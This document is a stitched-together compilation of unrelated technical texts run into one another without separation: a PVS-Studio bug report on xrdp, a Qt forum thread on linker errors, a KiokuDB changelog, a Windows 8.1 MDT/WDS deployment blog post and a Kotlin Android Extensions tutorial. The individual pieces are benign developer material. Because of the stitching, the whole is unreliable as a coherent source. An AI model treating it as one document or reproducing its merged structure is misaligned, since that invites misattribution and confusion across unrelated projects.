a collection of Xorg drivers to be used with xrdp. It is released under X11 (just like MIT, but use in advertising is prohibited) The development is based on rdesktop and FreeRDP. Originally, in order to be able to work with graphics, you would have to use a separate VNC server or a special X11 server with RDP support, X11rdp, but those became unnecessary with the release of xorgxrdp. We won't be talking about xorgxrdp in this article. Just like the previous project, xrdp is a tiny one, consisting of about 80 KLOC. More typos V525 The code contains the collection of similar blocks. Check items 'r', 'g', 'r' in lines 87, 88, 89. rfxencode_rgb_to_yuv.c 87 static int rfx_encode_format_rgb(const char *rgb_data, int width, int height, int stride_bytes, int pixel_format, uint8 *r_buf, uint8 *g_buf, uint8 *b_buf) { .... switch (pixel_format) { case RFX_FORMAT_BGRA: .... while (x < 64) { *lr_buf++ = r; *lg_buf++ = g; *lb_buf++ = r; // <= x++; } .... } .... } This code comes from the librfxcodec library, which implements the jpeg2000 codec to work with RemoteFX. The «red» color channel is read twice, while the «blue» channel is not read at all. Defects like this typically result from the use of copy-paste. The same bug was found in the similar function rfx_encode_format_argb: V525 The code contains the collection of similar blocks. Check items 'a', 'r', 'g', 'r' in lines 260, 261, 262, 263. rfxencode_rgb_to_yuv.c 260 while (x < 64) { *la_buf++ = a; *lr_buf++ = r; *lg_buf++ = g; *lb_buf++ = r; x++; } Array declaration V557 Array overrun is possible. The value of 'i — 8' index could reach 129. genkeymap.c 142 // evdev-map.c int xfree86_to_evdev[137-8+1] = { .... }; // genkeymap.c extern int xfree86_to_evdev[137-8]; int main(int argc, char **argv) { .... for (i = 8; i <= 137; i++) /* Keycodes */ { if (is_evdev) e.keycode = xfree86_to_evdev[i-8]; .... } .... } In the genkeymap.c file, the array is declared 1 element shorter than implied by the implementation. No bug will occur, though, because the evdev-map.c file stores the correct size, so there'll be no array overrun, which makes it a minor defect rather than a true error. Incorrect comparison V560 A part of conditional expression is always false: (cap_len < 0). xrdp_caps.c 616 // common/parse.h #if defined(B_ENDIAN) || defined(NEED_ALIGN) #define in_uint16_le(s, v) do \ .... #else #define in_uint16_le(s, v) do \ { \ (v) = *((unsigned short*)((s)->p)); \ (s)->p += 2; \ } while (0) #endif int xrdp_caps_process_confirm_active(struct xrdp_rdp *self, struct stream *s) { int cap_len; .... in_uint16_le(s, cap_len); .... if ((cap_len < 0) || (cap_len > 1024 * 1024)) { .... } .... } The value of a variable of type unsigned short is read into a variable of type int and then checked for being negative, which is not necessary because a value read from an unsigned type into a larger type can never become negative. Redundant checks V560 A part of conditional expression is always true: (bpp != 16). libxrdp.c 704 int EXPORT_CC libxrdp_send_pointer(struct xrdp_session *session, int cache_idx, char *data, char *mask, int x, int y, int bpp) { .... if ((bpp == 15) && (bpp != 16) && (bpp != 24) && (bpp != 32)) { g_writeln("libxrdp_send_pointer: error"); return 1; } .... } The not-equal checks aren't necessary because the first check does the job. The programmer was probably going to use the || operator to filter off incorrect arguments. Conclusion Today's check didn't reveal any critical bugs, but it did reveal a bunch of minor defects. That said, these projects, tiny as they are, are still used in many systems and, therefore, need some polishing. A small project shouldn't necessarily have tons of bugs in it, so testing the analyzer only on small projects isn't enough to reliably evaluate its effectiveness. This subject is discussed in more detail in the article "Feelings confirmed by numbers". The demo version of PVS-Studio is available on our website. Only users with full accounts can post comments. Log in, please.
https://habr.com/en/company/pvs-studio/blog/447878/
CC-MAIN-2019-30
refinedweb
1,615
66.23
Revision history for KiokuDB 0.57 2014-03-25 - stop using Class::MOP::load_class (perigrin, #4) 0.56 2013-11-07 - stop importing from multiple JSON versions 0.55 2013-11-05 - fix failing tests with newer versions of JSON - convert to dzil 0.54 2013-06-25 - packaging issues 0.53 2013-06-25 - Fix some test issues 0.52 2011-06-27 - Fix an issue where streaming entries can sometimes cause them to disappear. - Fix overlap with the new 'union' keyword in Moose::Util::TypeConstraints. 0.51 2011-03-31 - Die with an error when two objects try and register with the same ID but don't both do the KiokuDB::Role::ID::Content role. 0.50 2010-10-19 - Use new instance api in Moose to allow native traits to inline properly when used with KiokuDB::Class (doy) 0.49 2010-09-09 - Merge NUFFIN/0.48 and FLORA/0.48 0.48 2010-08-24 - (FLORA release) - Avoid warnings from Moose 1.10 0.48 2010-07-31 - (NUFFIN release) - Reupload with proper MANIFEST 0.47 2010-07-29 - Avoid warnings from Moose 1.09 (Dave Rolsky) - Numerous documentation fixes (David Leadbeater) - Move the Japanese translation of the tutorial under POD2::JA to allow perldoc -L ja KiokuDB::Tutorial - Don't allow the live object cache to grow too big 0.46 2010-06-27 - s/_03/ on the version 0.46_03 2010-06-27 - Internals change cleanups regarding weakening $entry->{data} with passthrough objects - fiddle leak tracking code around to avoid keeping temporary refs around, which makes Devel::FindRef more useful in the user's leak tracker 0.46_02 2010-06-27 - Support for caching of live objects (i.e. immutable ones) - Fix the =head1 NAME of Tutorial::JA - Move t/set.t into a standalone test fixture 0.46_01 2010-06-20 - Lots of refactoring to LiveObjects - metadata is keyed by ID, not object - keep_entries attribute allows entries to be discarded once used (defaults to true for compatibility, may change in the future) - clear_leaks/leak_tracker attributes - remove txn_{begin,commit,rollback} methods, as they require maintaining a stack to be properly used (#58166) - KiokuDB::Cmd no longer tries to rerun itself after autoinstall, this is very flakey when the installation is the result of an upgrade instead of a fresh install 0.45 2010-06-05 - Introduce KiokuDB::Backend::Role::GC which allows backends to construct their own garbage collector for the GC command. - name mangle inline classes in tests to avoid false failure reports (e.g. when a Foo.pm is in @INC) - add scoped_txn, txn_begin, txn_commit, txn_rollback 0.44 2010-06-02 - Remove accidental use of namespace::autoclean instead of namespace::clean (doy) - Proper fix for class_version this time =( 0.43 2010-05-26 - Now throws proper error objects instead of unintelligiable hash refs - Fix JSON serialization (omitted keys necessary for version tracking and GIN indexing) - Add a 'clone' method to KiokuDB::Set - Suppress additional recursion and repeated weaken() warnings - Try harder to skip DateTime formatter serialization roundtripping on JSON based backends 0.42 2010-04-16 - Update translation of tutorial (ktat) - use RegexpRef type constraint instead of Regexp (Regexp look blessed but not in C land) (doy) - Force stringification of version objects before serialization - 'mongodb' DSN moniker (omega) - Typemap support for the REF reftype (just an alias for SCALAR) - misc doc fixes 0.41 2010-03-21 - Re-release without extra crap in the tarball. 0.40 2010-03-21 - Allow using a JSON string as a DSN, e.g. '{"dsn":"dbi:SQLite:foo","schema":"MyApp::DB"}' - Added DateTime::Duration to the default typemap 0.39 2010-03-17 - Allow a backend to provide a default typemap in addition to the serializer one - call 'register_handle' on duck-typing backends in KiokuDB::BUILD - plug a leak where the live object set kept an indirect reference to passthrough entries 0.38 2010-03-06 - Fix a bug where object streams would end prematurely (Graham Barr) 0.37 2010-03-03 - Resolve long standing issues with TXN::Memory - TXN::Memory::Scan role now implements proper enumeration - Fixture::TXN::Scan verifies transactional semantics of enumeration for all transactional backends - Re-enable $linker->queue (fixed coderef failure case) - Various doc fixes - Class versioning (disabled by default) 0.36 2010-02-20 - Resolve a bug when deleting objects that are still live, lookup($dead_object_id) would still return the object even though it's not actually in storage. - Don't call $backend->exists with no arguments in FSCK - various API methods now just return; when invoked with no arguments, instead of potentially erroring at the backend level 0.35 2010-02-05 - bump dependency version for MooseX::YAML to prevent bad interaction with MooseX::Blessed::Reconstruct - add insert_nonroot and store_nonroot methods 0.34 2009-10-24 - fix an incorrect conversion to Try::Tiny (Dylan) - remove ciruclar role definition that causes does_role to inf loop - laxen the exception matching regex for missing .pm files in @INC to address CPAN testers reports with a different formatting for that error 0.33 2009-09-23 - Added Japanese tutorial KiokuDB::Tutorial::JA (ktat) - Correct indexing tutorial example (ask) - Use done_testing() instead of no_plan (dandv) - Fix behavior of KiokuDB::Lazy attributes with a trigger (a Moose change caused infinite recursion) - add a refresh method (no deep_refresh yet) 0.32 2009-07-30 - Don't assume all metaclasses have the does_role method - Various documentation fixes - Add no warnings 'recursion' to KiokuDB::Linker 0.31 2009-07-06 - Remove MooseX::Getopt usage from verbosity role - Don't depend on KiokuDB::Cmd in makefile, just warn (avoids recursive dependency) 0.30 2009-07-05 - Split KiokuDB::Cmd into a separate distribution 0.29 2009-06-27 - work around Test::Exception leak relating to closures in 5.8 - fix various new warnings with Moose 0.28 2009-06-26 - YAML serializer no longer stores extra data - MooseX::Clone is available for entry/reference - TypeMap::Entry::Std role was split up to smaller roles - TXN::Memory implements get() properly now (but not iterations yet) - ->connect("/path/to/config.yml") is now supported - propagate errors when loading classes in the linker - core reftypes (ARRAY, HASH etc) are handled by the typemap - SCALAR refs can be stored in JSON by using a custom typemap - Support for serializing closures 0.27 2009-04-20 - Add roles for digest based IDs - Change dep versions of IO and Tie::RefHash::Weak (they were wrong under 5.8) (Thanks to Otto Hirr) - KiokuDB::Lazy did not have any effect unless the value was a first class objects. Now it works for all refs (e.g. arrays of objects) - TODO list updated - correct dry_run option in WithDSN when transactions are unsupported 0.26 2009-04-08 - avoid using deprecated Moose/Class::MOP features - bump deps on Moose and Class::MOP 0.25 2009-03-27 - attempt to reduce memory usage by using a custom destruction guard - only run concurrency stress test if env var is set - various doc fixes 0.24 2009-02-28 - various doc fixes (Dan Dascalescu) - fix semantics when a Set::Deferred outlives the scope in which it was created and then gets vivified - add a test for MooseX::Traits - doc improvements - concurrency stress test - txn_do takes a 'scope' arg (calls new_scope automatically) - various doc fixes - add KiokuDB::Role::API 0.23 2009-01-25 - Add KiokuDB::DoNotSerialize trait (MooseX::Storage trait is still respected) - add Collapser::Buffer, which replaces the various temp attrs. Changes from the buffer are only written to live objects after a successful write to the backend. This also fixes duplicate ID::Content objects being inserted when one is already live. - Various doc improvements 0.22 2009-01-17 - Add TXN::Memory role to provide memory bufferred transactions to backends only supporting atomicity guarantees (e.g. CouchDB) - Documentation improvements - Allow skipping of test suite fixtures on broken backends - Various minor fixes and improvements 0.21 2009-01-14 - Readded the dependency on JSON in addition to JSON::XS 0.20 2009-01-13 - Refactored KiokuDB::TypeMap::Composite out of KiokuDB::TypeMap::Default - Added KiokuDB::TypeMap::Entry::StorableHook, which allows reusing of existing STORABLE_freeze hooks - Fixed handling of 'root' flag (was not being properly preserved) - Added 'is_root', 'set_root', 'unset_root' - Added a 'deep_update' method - Now depends on YAML::XS and JSON::XS (not optional deps anymore) - Various improvements to command line roles - Added a new GC command and a naive mark & sweep collector - Added a new Edit command using Proc::InvokeEditor to do a dump and a load in a single transaction - Added KiokuDB::Role::Intrinsic for objects which want to be collapsed intrinsically - Added KiokuDB::Role::Immutable for objects which never change after being inserted - Added KiokUDB::Role::ID::Content for content addressible objects - Test suite cleanups - Added ID enumeration to Scan role - Added 'allow_classes', 'allow_bases' and 'allow_class_builders' options to KiokuDB allowing for easy typemap creation. 0.19 2009-01-05 - Introduce KiokuDB::Stream::Objects, a Data::Stream::Bulk for objects that automatically creates a new scope for each block. This makes it much harder to leak when iterating through C<all_objects>. 0.18 2009-01-04 - Fix KiokUDB->connect("foo", @args) when the dsn string has no parameters (@args were being ignored) - Add a fixture to test that overwriting an entry is not allowed. 0.17 2008-12-30 - More docs - remove KiokuDB::Backend::Null which was historically used for testing but is long since useless. - remove deprecated command line tools - provide a 'txn_do' method in Role::TXN for backends which only implement txn_begin, txn_rollback and txn_commit - correct plan for t/uuid.t when a module is missing 0.16 2008-12-28 - Lots of docs - Fix KiokuDB::Reference's Storable hook limitation using a simple workaround. Not a real fix yet. - Remove unnecessary code from the UUID generation roles. - In KiokuDB::Cmd::OutputHandle, don't clobber the file before the command has actually run (remove EarlyBuild attr) 0.15 2008-12-28 - Last version was accidentally released off a problematic branch, rereleasing without that change 0.14 2008-12-28 - skip incremental JSON parsing tests if JSON::XS is missing - load IO::Handle to attempt to work around some weird test failures 0.13 2008-12-25 - t/serializer.t was causing bogus failures by not skipping if YAML::XS is unavailable - Cleanup of ( is => 'rw' ) bits in KiokuDB::Entry that should have really had private writers instead - Introduce partial handling of anonymous classes created due to runtime application of roles ( My::Role->meta->apply($instance) ) 0.12 2008-12-24 - Remove a use Devel::PartialDump that accidentally got committed 0.11 2008-12-24 - Fetching now queues items so that the backend's get() method is called fewer times, with more IDs each time. This significantly increases the performance of high latency backends, such as DBI or CouchDB. - fill in SimpleSearch stub fixture - Various fixes for Binary fixture - Make the various fields of the JSPON format customizable - Serialization is now pluggable using the Delegate serialization role 0.10 2008-12-22 - Load classes in the typemap resolution code, so that objects whose classes aren't necessarily loaded at compile time can still be inflated. - add 'import_yaml' to KiokuDB::Util - Refactor parts of the JSPON file backend into a JSON serialization role - Don't load thunks when updating partially loaded objects - No longer dies if txn_do is used but the backend doesn't supports it (implicit noop) - Add a new role and test for nested transaction supporting backends (partial rollback) 0.09 2008-12-17 - Remove KiokuDB::Resolver, moving ID assignment functionality into the collapser and the typemap - Fix bogus failures on 5.8 due to weird leaks (perl bug affecting test suite) 0.08 2008-12-05 - Fix a breakage in inflating passthrough intrinsic objects created with older versions of KiokuDB - Refactor command line tools to use App::Cmd - Add KiokuDB::LinkChecker and a FSCK command 0.07 2008-10-31 - Rename backend roles to KiokuDB::Backend::Role::Foo (omega) - Change entry packing format in Storable to something less idiotic 0.06 2008-10-31 - Use epoch, not ISO 8601 dates in JSPON map by default to avoid issues with DateTime::Format::ISO8601 dependency in testing. Will support both in the future - Fix tied support for JSPON 0.05 2008-10-31 - Add default typemaps for JSON and Storable serialization 0.04 2008-10-30 - Fix ->clear in KiokuDB::GIN 0.03 2008-10-28 - Lots of new docs - Smaller set of dependencies - Many deps are now optional (skips tests) - Some dependencies weren't necessary - Hand written code instead of MooseX::AttributeHelpers in live objects - Fixed an random test failure in live_objects.t that accidentally depended on address space ordering 0.02 2008-10-25 - Lazy meta trait for attributes - DoNotSerialize meta trait is now respected - Documentation updates - Removes several unrelated files form the dist - NoGetopt related fixes for command line tools - Remove JSPON backend files - Dependency fixes - KiokuDB::Role::ID 0.01 2008-10-16 - Initial Release
https://metacpan.org/changes/distribution/KiokuDB
CC-MAIN-2015-11
refinedweb
2,162
52.09
last post in this series. In previous posts we covered Today we’ll use the image we already created and we will deploy it to our XP test machine and we’ll prepare the Windows Deployment Server to deploy it using PXE boot. There is one issue with this plan. Some of the tools in the ADK for Windows 8.1 don’t support Windows XP. (User State Migration Tool version 6.3 and BOOTSECT.EXE). So what can you do? I'll summarize here but Michael Niehaus wrote about this in detail in his blog here. the just of it is that you need Now we are ready to deploy our image. First we will setup Windows Deployment Services to deploy the image using a network-based installation. 1- In server manager on our DC01 we’ll install the Windows Deployment Service and the Management tools 2- When prompted by the install wizard ensure that you select both the deployment server and the Transport server. The transport server is used to create multicast namespaces that transmit data. The deployment server is used to configure and remotely install Windows operating systems and it depends on the core parts of Transport Server. Complete the wizard and finish installing WDS. 3- Once this is done you need to use the Windows Deployment Services Management Console in the Tools menu and configure the WDS service. 4- In the Configuration Wizard, Select Integrated with Active Directory in the Install Option page. 5- and in the Remote Installation Folder location pick a location where WDS will store the boot files and images. In our case we put that on the D: drive. 6- The Proxy DHCP Server page is where we will identify if your WDS is co-existing with your DHCP server. In our case it’s all on the DC so we ensure that both check boxes are selected to enable the coexistence. 7- The PXE initial settings allows you to decide how you want to respond to machines requesting boot images and installation. For our lab we selected Respond to all client computers (without requiring administrator approval). after that just complete the wizard and finish the configuration. 8- our WDS server is installed and configured. It’s now time to import the boot images from our MDT image so they can be deployed through WDS. right-click Boot images and select “Add boot image”. 9- Browse to D:\DeploymentShare\Boot\ and select LitetouchPE_x86.wim for the 32bit image. In our case we imported both 32 and 64 bit boot wim files. Complete the wizard by giving your boot images proper Names and descriptions. (very useful if you have multiple images) and complete the wizard. 10- The last thing to do for the WDS server is to start the service by right-clicking the server and under All-Tasks click Start. That’s it. WDS is ready to serve up your MDT image as noted in the following screen captures of machines with no OS, booting from the network to install the image. From a Windows XP machine in our environment all we need to do is execute the BDD_Autorun script from \\DC01\deploymentShare$ and follow the instructions to deploy a fresh version of Window 8 and retain the files and profiles store locally. (the BDD_ scripts names are leftover from when MDT was called Business Desktop Deployment Toolkit) So… you’re ready to experiment. Download Windows Server 2012 R2 and create your lab environment. (Instructions can be found here) to experiment. we did not go in depth on customizing the deployment and automating it but there are lots of online resources to help you with that. Now you have one less excuse for not deploying a modern OS. Have fun! Cheers! Pierre Roman | Technology EvangelistTwitter | Facebook | LinkedIn
http://blogs.technet.com/b/canitpro/archive/2014/04/17/windows-8-1-deployment-from-the-ground-up-deploy-the-image.aspx
CC-MAIN-2014-35
refinedweb
635
64.71
[SOLVED] Unresolved External Symbol Error Hi All, I am getting three errors when I try to pass an object to another class. The errors are: film.obj:-1: error: LNK2001: unresolved external symbol "public: virtual struct QMetaObject const * __cdecl Film::metaObject(void)const " (?metaObject@Film@@UEBAPEBUQMetaObject@@XZ) film.obj:-1: error: LNK2001: unresolved external symbol "public: virtual void * __cdecl Film::qt_metacast(char const *)" (?qt_metacast@Film@@UEAAPEAXPEBD@Z) film.obj:-1: error: LNK2001: unresolved external symbol "public: virtual int __cdecl Film::qt_metacall(enum QMetaObject::Call,int,void * *)" (?qt_metacall@Film@@UEAAHW4Call@QMetaObject@@HPEAPEAX@Z) All have "File not found: film.obj" under the errors in red. The class that I am trying to pass: @class Film: public QObject { Q_OBJECT Q_PROPERTY(QString title READ getTitle WRITE setTitle) Q_PROPERTY(QString director READ getDirector WRITE setDirector ) Q_PROPERTY(int duration READ getDuration WRITE setDuration ) Q_PROPERTY(QDate releaseDate READ getReleaseDate WRITE setReleaseDate) public: Film(); // Default constructor Film(QString t,int dur, QString dir, QDate r ); // Constructor void setTitle(QString t); void setDuration (int dur); void setDirector (QString dir); void setReleaseDate (QDate r); QString getTitle(); QString getDirector(); int getDuration(); QDate getReleaseDate(); private: QString title; int duration; QString director; QDate releaseDate; };@ The class that has to receive it: Header file: @#include <QtCore> #include <QTextStream> #include <QFile> #include <QString> #include "film.h" class FilmWriter { public: FilmWriter(); FilmWriter(Film * myFilm); private: }; @ The CPP File: yFilm->getTitle(); out<<myyFilm->getDirector(); out<<myyFilm->getDuration(); out<<myyFilm->getReleaseDate().toString(); /* out<< myFilm.getTitle(); out<< myFilm.getDirector(); out<< myFilm.getDuration(); out<<myFilm.getReleaseDate().toString(); */ mFile.flush(); mFile.close(); } @ Please help. Thanks - SGaist Lifetime Qt Champion Hi, Did you re-run qmake after adding Q_OBJECT to your Film class ? Sorted. Thanks for the help. - SGaist Lifetime Qt Champion You're welcome, Don't forget to update the thread's title prepending solved so other forum users may know a solution has been found :) Hi, Im new in QT. Can you write more informations how to re-run qmake . I have one more question. Is the qmake file the same as MyProject.pro ?? - the .pro file in my project ? - mrjj Qt Champions 2016 @Lordon Hi and welcome Yes MyProject.pro is the qmake file. - To re-run it means to go to build menu and select "Run qmake" to be sure. In rare cases , you might also delete your build folder for things to be really remade. To find build folder, look in "projects" tab, and its just Build directory. This folder contains auto generated files and safe to delete all files in. So you exploer to go there and delete all in those cases. Oh, my mistake. I forgot say, that Im working in VisualStudio. There is not something like "Run qmake". Is there any way to do this in Visual Studio ? - mrjj Qt Champions 2016 Oh. I never used VS with Qt so Im not sure. Normally you also install the Qt VS plugin that handles all this. Since VS dont really use .pro files i assume you have this plugin as you sound you can compile. Did you install this plugin ? If not, you will have that issue that Qt want a tool called moc.exe run on normal compiles. This tools makes connect and a lot of other core features work. If its not run, then you will see errors like in this thread. What version of VS are you using ? Make sure it all matches with version etc. @Lordon You don't need to run qmake if using Visual Studio with the Qt VS plugin, as VS will set up custom build steps for your .ui files (to run uic) and .h files that use Q_OBJECT (to run moc).
https://forum.qt.io/topic/30830/solved-unresolved-external-symbol-error
CC-MAIN-2018-09
refinedweb
606
59.5
Kotlin Android Extensions Learn about the Kotlin Android Extensions plugin from JetBrains that can help you eliminate much of the boilerplate code in your Android app. Version - Kotlin 1.2, Android 4.4, Android Studio 3 The Kotlin programming language has improved the Android development experience in many ways, especially since the announcement in 2017 of first-party support for the language. Null safety, extensions, lambdas, the powerful Kotlin standard library and many other features all add up to a better and more enjoyable way to make Android apps. In addition to the Kotlin language, JetBrains also has developed a plugin for Android called the Kotlin Android Extensions, which was created to further ease everyday Android development. The extensions are a Kotlin plugin that every Android developer should be aware of. In this tutorial, you’ll explore many of the features that come with the extensions, including the following main features: View binding View binding enables you to refer to views just like any other variable, by using synthethic properties, without the need to initialize view references by calling the ubiquitous findViewById(). Note: If you have used Butter Knife in the past, you’ll know that it also helps with view binding. However, the binding is done in a different way. Butter Knife requires you to write a variable and annotate it with the identifier of the corresponding view. Also, inside methods like Activity onCreate(), you need to call a method that will bind all those annotated variables at once. Using the Kotlin Android Extensions, you don’t need to annotate any variable. The binding is done the first time you need to access the corresponding view and saved into a cache. More on this later. LayoutContainer The LayoutContainer interface allows you to use view binding with views such as the ViewHolder for a RecyclerView. Parcelize annotation The @Parcelize annotation saves you from having to write all the boilerplate code related to implementing the Parcelable interface. Note: This tutorial assumes you have previous experience with developing for Android in Kotlin. If you are unfamiliar with the language, have a look at this tutorial. If you’re beginning with Android, check out some of our Getting Started and other Android tutorials. Getting started The project you’ll be working with, YANA (Yet Another Notepad App), is an app to write notes. Use the Download Materials button at the top or bottom of this tutorial to download the starter project. Once downloaded, open the starter project in Android Studio 3.0.1 or greater, and give it a build and run. Tap the floating action button to add a note, and tap the back button to save a note into your list. Taking a look at the project, you see that it consists of two activities: - NoteListActivity.kt: The main activity that lists all your existing notes and lets you create or edit one. - NoteDetailActivity.kt: This will show an existing note and also can handle a new note. Setting up Kotlin Android Extensions Open the build.gradle file for the app module and add the following, just below the ‘kotlin-android’ plugin: apply plugin: 'kotlin-android-extensions' That’s all the setup you need to use the plugin! Now you’re ready to start using the extensions. Note: If you create a new Android app with Kotlin support from scratch, you’ll see that the plugin is already included in the app build.gradle file. View binding Open NoteListActivity, and remove the following lines from the onCreate method: val noteListView: RecyclerView = findViewById(R.id.noteListView) val addNoteView: View = findViewById(R.id.addNoteView) Android Studio should notice that it’s missing imports for your two views. You can hit Option-Return on macOS or Alt-Enter on PC to pull in the imports. Make sure to choose the import that starts with kotlinx to use the extensions. If you check the imports now at the top of the file, you should see the following: import kotlinx.android.synthetic.main.activity_note_list.* In order to generate the synthetic properties, to reference the views of the layout, you need to import kotlinx.android.synthetic.main.<layout>.*. In this case, the layout is activity_note_list. The asterisk wild-card at the end means that all possible views will be pulled in from the file. You can also import views individually if you wish, by replacing the asterisk with the view name. Your `onCreate()` method should now look like this: override fun onCreate(savedInstanceState: Bundle?) { super.onCreate(savedInstanceState) setContentView(R.layout.activity_note_list) noteRepository = ... adapter = ... // 1 noteListView.adapter = adapter // 2 addNoteView.setOnClickListener { addNote() } } - To reference the list that shows notes, check the `id` in the activity_note_list.xml file, you’ll find that it’s noteListView. So, you access it using noteListView. - The floating action button has the `id` addNoteView, so you reference it using addNoteView. It’s important to note here that your synthetic view reference has the same name as the `id` you used in the layout file. Many teams have their own naming conventions on XML identifiers, so you may need to update your convention if you want to stick to camel case on the view references in your code. Next, open NoteDetailActivity and remove the following view properties: private lateinit var editNoteView: EditText private lateinit var lowPriorityView: View private lateinit var normalPriorityView: View private lateinit var highPriorityView: View private lateinit var urgentPriorityView: View private lateinit var noteCardView: CardView Also, remove the findViewById calls in onCreate(). The project will not compile at this point because all of those undeclared views. However, if you take a look into the view ids of activity_note_detail.xml and note_priorities_chooser_view.xml, you’ll notice they match the undeclared views you have in the activity. Add the following imports to the top of the file: import kotlinx.android.synthetic.main.activity_note_detail.* import kotlinx.android.synthetic.main.note_priorities_chooser_view.* Now the project should compile again :] Finally, do similar with NoteListAdapter, and remove the following in NoteViewHolder: private val noteTextView: TextView = itemView.findViewById(R.id.noteTextView) private val noteDateView: TextView = itemView.findViewById(R.id.noteDateView) private val noteCardView: CardView = itemView.findViewById(R.id.noteCardView) Add the following import to the file: import kotlinx.android.synthetic.main.note_item.view.* Note: in a view you have to import kotlinx.android.synthetic.main.<layout>.view.* And then prepend each referenced view with itemView, like so: fun bind(note: Note, listener: Listener) { itemView.noteTextView.text = note.text itemView.noteCardView.setCardBackgroundColor( ContextCompat.getColor(itemView.noteCardView.context, note.getPriorityColor())) itemView.noteCardView.setOnClickListener { listener.onNoteClick(itemView.noteCardView, note) } itemView.noteDateView.text = sdf.format(Date(note.lastModifed)) } Build and run the app, and you’ll see that everything is working like before, and you’ve removed all the findViewById() boilerplate. :] View binding under the hood I bet you’re curious about how this “magic” works. Fortunately, there is a tool to decompile the code! Open NoteListActivity and go to Tools > Kotlin > Show Kotlin Bytecode and then press the Decompile button. You’ll find the following method, generated by the plugin: public View _$_findCachedViewById(int var1) { if(this._$_findViewCache == null) { this._$_findViewCache = new HashMap(); } View var2 = (View)this._$_findViewCache.get(Integer.valueOf(var1)); if(var2 == null) { var2 = this.findViewById(var1); this._$_findViewCache.put(Integer.valueOf(var1), var2); } return var2; } Now check that this method is called whenever you reference a view by right-clicking on it and selecting Find Usages. One example usage is: RecyclerView var10000 = (RecyclerView)this._$_findCachedViewById(id.noteListView); _$_findCachedViewById() creates a view cache HashMap, tries to find the cached view, and, if it doesn’t find it, then calls good old findViewById() and saves it to the cache map. Pretty cool right? :] Note: You’ll see that a _$_clearFindViewByIdCache was also generated, but the Activity doesn’t call it. This method is only needed when using Fragments, as the Fragment’s onDestroyView() calls it. Check what the plugin does with the adapter. Open NoteListAdapter and decompile it. To your surprise, you won’t find the _$_findCachedViewById method. Instead, you’ll find that each time that the bind() method is called, findViewById() is called. This leads to a performance problem (because it will always have to find the views through the hierarchy), the exact problem that a ViewHolder should solve. So, this is not following the ViewHolder pattern! To avoid this, you could workaround with the following approach: class NoteViewHolder(itemView: View) : RecyclerView.ViewHolder(itemView) { private val noteTextView = itemView.noteTextView private val noteCardView = itemView.noteCardView private val noteDateView = itemView.noteDateView private val sdf = SimpleDateFormat("yyyy-MM-dd HH:mm", Locale.getDefault()) fun bind(note: Note, listener: Listener) {)) } } Now, if you decompile, you’ll see that findViewById() is only called when the NoteViewHolder is created, so you’re safe again! However, there is another approach. You can use the LayoutContainer interface, which will be covered in the following section. Experimental features Certain features of the Kotlin Android Extensions have not yet been deemed production ready, and are considered experimental features. These include the LayoutContainer interface and the @Parcelize annotation. To enable the experimental features, open the app module build.gradle file again and add the following, just below the ‘kotlin-android-extensions’ plugin: androidExtensions { experimental = true } LayoutContainer As you’ve seen, it’s easy to access views with synthethic properties by using the corresponding kotlinx imports. This applies to both activities and fragments. But, in the case of a ViewHolder (or any class that has a container view), you can implement the LayoutContainer interface to avoid workarounds like the one you used before. Open again NoteListAdapter and implement the LayoutContainer interface. // 1 import kotlinx.android.extensions.LayoutContainer // 2 import kotlinx.android.synthetic.main.note_item.* ... // 3 class NoteViewHolder(override val containerView: View) : RecyclerView.ViewHolder(containerView), LayoutContainer { private val sdf = SimpleDateFormat("yyyy-MM-dd HH:mm", Locale.getDefault()) fun bind(note: Note, listener: Listener) { // 4)) } } - Import the LayoutContainer interface. - To reference the views of the note_item.xml layout using LayoutContainer you need to import kotlinx.android.synthetic.main.note_item.* - Add the interface to NoteViewHolder. To comply with it, you provide a containerView property override in the primary constructor, which then gets passed along to the superclass. - Finally, use the properties that reference the views of the layout. If you decompile this code, you’ll see that it uses _$_findCachedViewById() to access the views. Build and run the app to see the app working just like before, this time with LayoutContainer. View caching strategy You’ve seen that _$_findCachedViewById uses a HashMap by default. The map uses an integer for the key and a view object for the value. You could use a SparseArray for the storage instead. If you prefer using a SparseArray, you can annotate the Activity/Fragment/ViewHolder with: @ContainerOptions(cache = CacheImplementation.SPARSE_ARRAY) If you want to disable the cache, the annotation is: @ContainerOptions(cache = CacheImplementation.NO_CACHE) It’s also possible to set a module-level caching strategy by setting the defaultCacheImplementation value in the androidExtensions in the build.gradle file. @Parcelize Implementing the Parcelable interface on a custom class allows you to add instances of the class to a parcel, for example, adding them into a Bundle to pass between Android components. There is a fair amount of boilerplate needed to implement Parcelable. Libraries like AutoValue have been created to help with that boilerplate. The Kotlin Android Extensions have their own way to help you implement Parcelable, using the @Parcelize annotation. Open the Note class and modify it to the following: @Parcelize data class Note(var text: String, var priority: Int = 0, var lastModifed: Long = Date().time, val id: String = UUID.randomUUID().toString()) : Parcelable You’ve removed literally all the code in the body of the class, and replaced it with the single annotation. Note: Android Studio may highlight the class thinking there’s a compile error. But this is a known bug, and here is the issue. Fear not, you can build and run the project without any problems. Build and run the app, and all is working as before. Implementing Parcelable is just that simple! Imagine how much time this will save you. :] Where To Go From Here? Congratulations! You’ve just learned the Kotlin Android Extensions, and seen how they let you remove a ton of boilerplate code from your project. You can download the final version of the project using the Download Materials button at the top or bottom of this tutorial. Here are some great references to learn more about the development of Kotlin Android Extensions: - Official docs: you can have a look at them here. - Kotlin Evolution and Enhancement Process: these are ideas and proposals that may go into future Kotlin releases, also called KEEPs. For example, the @Parcelize annotation, the view caching strategy and the LayoutContainer interface have their own KEEPs. - If you liked decompiling the code and checking what’s under the hood, then I recommend you watch Exploring Java hidden costs by Jake Wharton. Finally, as a separate project from Kotlin Android Extensions, Google has released Android KTX. KTX is not a plugin, but instead another set of extensions to ease Android development. KTX simplifies working with strings, SharedPreferences, and other parts of Android. Feel free to share your feedback, findings or ask any questions in the comments below or in the forums. I hope you enjoyed this tutorial on the Kotlin Android Extenstions!
https://www.raywenderlich.com/84-kotlin-android-extensions
CC-MAIN-2021-17
refinedweb
2,221
56.96
